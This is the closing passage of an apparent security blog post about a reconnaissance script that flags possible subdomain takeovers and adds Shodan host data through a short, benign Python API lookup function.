<!--kg-card-end: markdown--><p>There are other good tools out there that check for subdomain takeover opportunities (when a subdomain points to a third party service that is no longer owned by the domain owner, such as a released S3 bucket, or closed github account).</p><p>You can find a good list of services that may allow takeover on <a href="https://github.com/EdOverflow/can-i-take-over-xyz?ref=nullsweep.com#all-entries">github</a>, and a tool called <a href="https://github.com/haccer/subjack?ref=nullsweep.com">subjack</a>, which has some overlap with the one I wrote. Seeing a screenshot of any of those services likely means a takeover could be possible.</p><h2 id="integrating-shodan">Integrating Shodan</h2><p>Finally, I wanted to see what, if anything, shodan had picked up about the services found. Shodan charges for larger result sets, but by quering a specific IP address, we can leverage the API with a free account just fine.</p><!--kg-card-begin: markdown--><pre><code class="language-python">def shodan_data(ip):
    if api is None:
        return (&quot;&quot;, False)
    try:
        host = api.host(ip)
        return (host, True)
    except shodan.APIError as e:
        return (str(e), False)
</code></pre>
<!--kg-card-end: markdown--><p>In the above function, I handle the case that the user has not passed in an API key, in which case shodan report data will be blank, and the case where shodan errors. The most common cause of this was shodan having no information about the provided IP address.</p><h2 id="final-thoughts">Final Thoughts</h2><p>The script turned out to be quite useful! It yields a fair amount of data that is quick to visually process and follow up on. </p><p>I would love to hear from the community on other techniques or tools I missed!</p>]]></content:encoded></item></channel></rss>